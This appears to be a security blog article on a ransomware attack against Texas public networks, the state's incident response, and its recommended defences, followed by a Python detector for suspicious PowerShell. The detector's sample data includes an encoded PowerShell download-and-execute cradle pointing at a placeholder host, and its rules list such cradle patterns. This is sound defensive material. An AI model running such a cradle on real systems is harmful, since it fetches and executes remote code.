We recently wrote about the upsurge in ransomware attacks, and one of the examples in that article was the recent attack on about two dozen governmental and educational networks in the state of Texas. Texas was initially tight-lipped about what it was doing to mitigate the attack, in an effort to prevent the attackers from learning about its defensive strategies and systems and adapting their attack vectors in response.
The State of Texas Department of Information Resources (DIR) took charge of the situation and was able to provide a central point for coordinating the response. A large part of its success was the cybersecurity incident response plan (CIRT) that was already in place. This plan helped first responders know what to do and whom to notify and involve in the process. Within 4 days all the affected sites had been visited, and 25% of the sites were remediated. Within a week's time, all of the sites had fully recovered from the attack.
The DIR recently went public with a list of cybersecurity practices that it believes are best suited to heading off crypto-ransomware attacks.
- Create and maintain a cybersecurity incident response plan and train an IR team.
- For remotely managed servers in a cloud services environment, only allow authentication to remote access software from inside the cloud service provider's location.
- Use two factor authentication on remote administration tools.
- Use VPNs for remote connections instead of RDP (Remote Desktop Protocol).
- Block inbound network traffic from Tor exit nodes, which interferes with the exploit's ability to connect and gain traction.
- Block outbound network traffic to Pastebin, which is a favorite site to store stolen information.
- Detect unusual PowerShell processes by using Endpoint Detection and Response solutions.
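The last item is the one most teams have to build logic for themselves, so here is an added illustration of what "unusual PowerShell" detection looks like in practice. This is example code written for this article, not something published by DIR or the original post: it scores constructed process-creation events (field names modelled loosely on Sysmon Event ID 1 / Windows Security 4688 records, and assumed here) for the traits EDR rules typically key on: an encoded command line, a hidden window, an execution-policy bypass, a download cradle, and an Office or script-host parent process. Encoded commands are decoded (base64 of UTF-16LE) so that the cradle check also sees the payload.

```python
"""Score PowerShell process-creation events for signs of abuse.

Added illustration only; event records below are constructed for the demo
and the field names (host, parent, cmdline) are assumptions, not a real
EDR schema.
"""
import base64
import re
from typing import Dict, List

# Parent processes that rarely have a legitimate reason to spawn PowerShell.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                      "mshta.exe", "wscript.exe", "cscript.exe"}

# -EncodedCommand accepts abbreviated switch names; capture the base64 blob.
ENC_RE = re.compile(r"(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)

# (rule name, weight, regex applied to the command line plus any decoded payload)
RULES = [
    ("encoded_command", 3, ENC_RE),
    ("hidden_window", 2, re.compile(r"(?:^|\s)-w\w*\s+hidden\b", re.I)),
    ("execution_policy_bypass", 1, re.compile(r"(?:^|\s)-e\w*\s+bypass\b", re.I)),
    ("download_cradle", 3, re.compile(
        r"new-object\s+(?:system\.)?net\.webclient|downloadstring|downloadfile"
        r"|invoke-webrequest|\biwr\b|\biex\b|invoke-expression", re.I)),
]
ALERT_THRESHOLD = 4  # tune against your own baseline of admin activity


def decode_encoded_command(cmdline: str) -> str:
    """Return the UTF-16LE script behind -EncodedCommand, or '' if absent or undecodable."""
    match = ENC_RE.search(cmdline)
    if not match:
        return ""
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_event(event: Dict[str, str]) -> Dict[str, object]:
    """Apply every rule to one event and return score, matched rules and decoded payload."""
    cmdline = event.get("cmdline", "")
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline + "\n" + decoded  # inspect the visible and the decoded command
    hits = [name for name, _w, rx in RULES if rx.search(haystack)]
    score = sum(w for name, w, _rx in RULES if name in hits)
    parent = event.get("parent", "").rsplit("\\", 1)[-1].lower()
    if parent in SUSPICIOUS_PARENTS:
        hits.append("suspicious_parent:" + parent)
        score += 3
    return {"host": event.get("host"), "score": score, "hits": hits,
            "decoded": decoded, "alert": score >= ALERT_THRESHOLD}


def triage(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return only the events that cross the alert threshold."""
    return [finding for finding in map(score_event, events) if finding["alert"]]


def _enc(script: str) -> str:
    """Constructed helper: encode a script the way -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample events (not real telemetry); hostnames and paths are placeholders.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    # Benign: scheduled inventory script started by a service host.
    {"host": "ws-01", "parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\scripts\inventory.ps1"},
    # Suspicious: Word spawning a hidden, encoded PowerShell that pulls a second stage.
    {"host": "ws-02", "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + _enc("IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/a')")},
    # Borderline: an admin fetching a file interactively from a console; scores below threshold.
    {"host": "srv-03", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "powershell.exe -Command \"Invoke-WebRequest -Uri https://placeholder.invalid/tools.zip"
                " -OutFile C:\\tmp\\tools.zip\""},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(f"{finding['host']}: score={finding['score']} hits={finding['hits']}")
```

Run as-is, only the Word-spawned event is reported; the interactive `Invoke-WebRequest` scores below the threshold because a single download indicator on its own is common admin behaviour. The weighting is the part to adapt: a parent-process rule catches the macro-to-PowerShell chain regardless of how the command line is obfuscated, while the decoded-payload check is what keeps `-EncodedCommand` from hiding a download cradle from a plain string match.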
This is good advice for anyone who is responsible for protecting a larger commercial or governmental network. Considering the increased activity by ransomware groups, security professionals should get busy implementing these concepts.